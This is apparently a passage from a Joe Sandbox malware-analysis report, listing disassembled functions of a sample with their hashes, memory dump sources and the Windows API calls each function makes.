                                                                                                                                                                                          • Opcode ID: bc20e5ba685eb4aef52f3536df422a3bd45db03f4fca7a3746182272f171e16d
                                                                                                                                                                                          • Instruction ID: f300c9bd6869c3c145b9ccb674fc910b54bcc863bf74caf8ee331b366ee1b776
                                                                                                                                                                                          • Opcode Fuzzy Hash: bc20e5ba685eb4aef52f3536df422a3bd45db03f4fca7a3746182272f171e16d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CD14D74A04209EFDB18EF98C485AEEBBB5FF88310F544159E915AB392DB34AD41CF90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 91622051191f242f3cfaba7cd2b53001e6b395c482b78b969a0b385ea7823db8
                                                                                                                                                                                          • Instruction ID: be51dfffa052e46310821f5b0d17c8f120ea5c72f847bef178b21d917e981c28
                                                                                                                                                                                          • Opcode Fuzzy Hash: 91622051191f242f3cfaba7cd2b53001e6b395c482b78b969a0b385ea7823db8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D51C675A00108EFDB10DF68C844AED7BE1FB85365F198168EC189B392D7B5ED46CB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 0079FCCE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: BuffCharLower
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2358735015-0
                                                                                                                                                                                          • Opcode ID: 4fbd6cade7b70329116af6cf3ab6c9e18255d22a44330e2f6637c012cf726d38
                                                                                                                                                                                          • Instruction ID: 51e3daf640a18bea6a346a147c42722ffb3b98bff21c65e224e4d0944fd45f15
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fbd6cade7b70329116af6cf3ab6c9e18255d22a44330e2f6637c012cf726d38
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4541C4B2600209EFDF11EF68D8959AEB7B8EF44314B20853EE916D7251EB74DE05CB50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0073668B,?,?,007362FA,?,00000001,?,?,00000000), ref: 0073664A
                                                                                                                                                                                            • Part of subcall function 0073663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0073665C
                                                                                                                                                                                            • Part of subcall function 0073663E: FreeLibrary.KERNEL32(00000000,?,?,0073668B,?,?,007362FA,?,00000001,?,?,00000000), ref: 0073666E
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,007362FA,?,00000001,?,?,00000000), ref: 007366AB
                                                                                                                                                                                            • Part of subcall function 00736607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00775657,?,?,007362FA,?,00000001,?,?,00000000), ref: 00736610
                                                                                                                                                                                            • Part of subcall function 00736607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00736622
                                                                                                                                                                                            • Part of subcall function 00736607: FreeLibrary.KERNEL32(00000000,?,?,00775657,?,?,007362FA,?,00000001,?,?,00000000), ref: 00736635
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2632591731-0
                                                                                                                                                                                          • Opcode ID: 4910b7011b74e5eae9b7f72c10f88c9b94d091326a55d785919a460126331d7a
                                                                                                                                                                                          • Instruction ID: 33c477fff33b6df5d419dd62f55e3284c7c0313491749497f442e8436d7fa0db
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4910b7011b74e5eae9b7f72c10f88c9b94d091326a55d785919a460126331d7a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5011C475600205FAEF24BB20C90BBADBBA5AF54751F10C42DF442A61C3EEB99A059B50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __wsopen_s
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3347428461-0
                                                                                                                                                                                          • Opcode ID: fb3d5fda219cb2b44a44281644f64b5d868a5e8e7053081eada21111592008e5
                                                                                                                                                                                          • Instruction ID: 2adb94662343a542a4172a7b586eeeaf3812756fb0a3dd605bbe04d45d899ec5
                                                                                                                                                                                          • Opcode Fuzzy Hash: fb3d5fda219cb2b44a44281644f64b5d868a5e8e7053081eada21111592008e5
                                                                                                                                                                                          • Instruction Fuzzy Hash: A8111875A0420AEFCF15DF98E94599A7BF4FF48310F114169FC09AB311DA31EE218BA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                          • Instruction ID: fd8c49c5a843f417af1e835ea2e385614b2d3309da61582424577b33736276fe
                                                                                                                                                                                          • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CF0F932500A10D6D7753A269C0D7DA33598F42336F100715FC66971D2EBFCF90A8693
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 007AF987
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EnvironmentVariable
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1431749950-0
                                                                                                                                                                                          • Opcode ID: 15df63201c0e42ab6ef006b0c3c0e4c674d70ae7f53e5676c6dffad1f1cbd1ed
                                                                                                                                                                                          • Instruction ID: c70d0f3599b5f7f93f565b3e5853ca21c9db751e75d03cfecab4ea0855c89bfa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 15df63201c0e42ab6ef006b0c3c0e4c674d70ae7f53e5676c6dffad1f1cbd1ed
                                                                                                                                                                                          • Instruction Fuzzy Hash: 37F03172600208BFDB15EBA5DC4AD9F77B8EF89710F004055F9059B261DA78AD45C791
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,00756A79,?,0000015D,?,?,?,?,007585B0,000000FF,00000000,?,?), ref: 00763BC5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                          • Opcode ID: 7a3b042f79e8568aa00c1eb3bba4a5963b0dc41a85698478cf6c65449d4090c3
                                                                                                                                                                                          • Instruction ID: f6c79113b6ee492c1c3d49aa036ebaaace20d4ccf4edfdb5c2933c24ac44ab18
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a3b042f79e8568aa00c1eb3bba4a5963b0dc41a85698478cf6c65449d4090c3
                                                                                                                                                                                          • Instruction Fuzzy Hash: F3E06DA1640A20A6DA2136769C09B9A7A48EF413A1F1A0161EC1F965A1DFACCE40C6E4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 09584ee615ed95f1c01437ccad4c6b2159690a3ff1d802585e88696e5cb3c8ea
                                                                                                                                                                                          • Instruction ID: 2d44057ffc029ca99e0d7be8f06afb9eb6ddd13e2f0bf1f6f0f22134bf52a39d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 09584ee615ed95f1c01437ccad4c6b2159690a3ff1d802585e88696e5cb3c8ea
                                                                                                                                                                                          • Instruction Fuzzy Hash: E6F0A970005702DFDB349F60D8A0822BBF0BF0036A324C97EE1CA86611C779A840CF10
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __fread_nolock
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2638373210-0
                                                                                                                                                                                          • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                          • Instruction ID: 9b989fede7fdc264ef7ec154ef8093600db418b4004a1b1f846e5cc448d1bb2f
                                                                                                                                                                                          • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CF0F87550020DFFDF05DF90C941E9E7B79FB08318F208585F9159A151C37AEA61ABA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00733963
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: IconNotifyShell_
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1144537725-0
                                                                                                                                                                                          • Opcode ID: ba6aaf99f5894403925dc1f1da6689517ef7e5de06104fd21afa59b6c04a4bed
                                                                                                                                                                                          • Instruction ID: 1a845136d516c6252da939a3abce53131b63d1bce305b1a3aaf3bef3f9c4cbd9
                                                                                                                                                                                          • Opcode Fuzzy Hash: ba6aaf99f5894403925dc1f1da6689517ef7e5de06104fd21afa59b6c04a4bed
                                                                                                                                                                                          • Instruction Fuzzy Hash: E0F037709143549FE7A29F24DC4D7D57BBCB70170CF0040A9A64496292D7B85B88CF51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00733A76
                                                                                                                                                                                            • Part of subcall function 00738577: _wcslen.LIBCMT ref: 0073858A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LongNamePath_wcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 541455249-0
                                                                                                                                                                                          • Opcode ID: 0fd152e9fd26eb680dc0a9d4afad68ec858825d95995c351d83b33ea842b37b1
                                                                                                                                                                                          • Instruction ID: cf789caaee97c669f9e40e2d79421eac1c9bee690f7bb9d304f3c2b49d57712d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fd152e9fd26eb680dc0a9d4afad68ec858825d95995c351d83b33ea842b37b1
                                                                                                                                                                                          • Instruction Fuzzy Hash: FFE0CD7290022457CB2092589C09FDA77DDEFC8790F054075FC09D7255D974ED808690
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,00000000,?,00770A84,?,?,00000000,?,00770A84,00000000,0000000C), ref: 00770737
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                          • Opcode ID: 977afb5854ce02e10fc344a0b256e63f3f832ffae5d104df1950d2f07b78bd4c
                                                                                                                                                                                          • Instruction ID: b08dfc2ac624767ee29131c7c6f1bafc581686d96041c7068e0b502d3e410f66
                                                                                                                                                                                          • Opcode Fuzzy Hash: 977afb5854ce02e10fc344a0b256e63f3f832ffae5d104df1950d2f07b78bd4c
                                                                                                                                                                                          • Instruction Fuzzy Hash: A6D06C3200010DBBDF128F85DD06EDA3BAAFB48714F018010BE1856020C736E821AB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,0079D840), ref: 0079EAB1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                          • Opcode ID: bff8dd02def216e620249897928006a6bd3128e4217e4c22ab8ed71d583ffef3
                                                                                                                                                                                          • Instruction ID: 8df3f93695f4a063589435b8d97b55c3d2c9ae64c7ae248f37dcef510d2a6954
                                                                                                                                                                                          • Opcode Fuzzy Hash: bff8dd02def216e620249897928006a6bd3128e4217e4c22ab8ed71d583ffef3
                                                                                                                                                                                          • Instruction Fuzzy Hash: AFB0923400060005AD284A386A0A9A93300B8423A5BDC9BC4E479852F2C33D9C8FA950
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0079DC54: FindFirstFileW.KERNEL32(?,?), ref: 0079DCCB
                                                                                                                                                                                            • Part of subcall function 0079DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 0079DD1B
                                                                                                                                                                                            • Part of subcall function 0079DC54: FindNextFileW.KERNEL32(00000000,00000010), ref: 0079DD2C
                                                                                                                                                                                            • Part of subcall function 0079DC54: FindClose.KERNEL32(00000000), ref: 0079DD43
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 007A666E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2191629493-0
                                                                                                                                                                                          • Opcode ID: 2b9e7d7cf90ed00ee2fa2e5dee12c7fdf6a2ca40699c673bc77d2ad369e192f9
                                                                                                                                                                                          • Instruction ID: 002caa5fc0319c14316655f34f82c04217d73f9b5030f47caca4b2be66fdc892
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b9e7d7cf90ed00ee2fa2e5dee12c7fdf6a2ca40699c673bc77d2ad369e192f9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CF0A076204600DFDB24EF58D849F6EB7E5AF88320F048459F9498B352CB78BC01CB95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0074FC86
                                                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0078FCB8
                                                                                                                                                                                          • IsIconic.USER32(00000000), ref: 0078FCC1
                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000009), ref: 0078FCCE
                                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0078FCD8
                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0078FCEE
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0078FCF5
                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0078FD01
                                                                                                                                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0078FD12
                                                                                                                                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0078FD1A
                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0078FD22
                                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0078FD25
                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078FD3A
                                                                                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0078FD45
                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078FD4F
